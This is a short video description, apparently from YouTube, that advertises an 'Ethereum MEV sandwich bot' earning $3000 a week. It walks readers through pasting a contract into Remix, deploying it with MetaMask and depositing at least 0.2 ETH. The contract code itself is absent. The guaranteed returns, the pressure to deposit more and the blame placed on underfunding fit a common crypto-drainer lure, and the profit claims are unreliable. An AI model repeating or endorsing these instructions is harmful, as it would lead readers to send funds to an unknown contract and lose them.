Ethereum MEV Bot Easy Guide || Sandwich Bot || 25 APRIL 2023 || ✨ UPDATED ✨|| $3000 / WEEK

Описание к видео Ethereum MEV Bot Easy Guide || Sandwich Bot || 25 APRIL 2023 || ✨ UPDATED ✨|| $3000 / WEEK


STEP BY STEP Instructions :

👉 Download MetaMask

👉 Access the Remix IDE

👉 Right click on the 'contracts' folder and create a new file. Rename it as you like—i.e., 'Bot.sol'

👉 Paste this code in Remix:

👉 Move to the 'Solidity Compiler' tab, select version '0.6.6' and then click 'Compile'

👉 Move to the 'Deploy' tab, select 'Injected Provider' as the environment, then click 'Deploy'. After the transaction is confirmed, it's your own BOT now

👉 Deposit funds (at least 0.2 ETH to prevent negating slippage) to your exact contract/bot address

👉 After your transaction is confirmed, start the bot by clicking the 'start' button. Withdraw anytime by clicking 'withdrawal'

🚨 EDIT: I've received messages from people who didn't fund the contract with enough Ethereum to cover gas fees and possible burn fees. The bot targets token contracts with a max 10% burn fee and anything lower. However, nowadays most tokens come with 2~6% fees. If you fund the contract with 0.2 ETH or less, and the bot targets another token with high burn fees, the contract will waste a lot of gas fees. I recommend funding the contract with at least 0.2 ETH to make sure that won't happen.

#MevBot #ethereum #eth #slippage #mev #mevbot #uniswap


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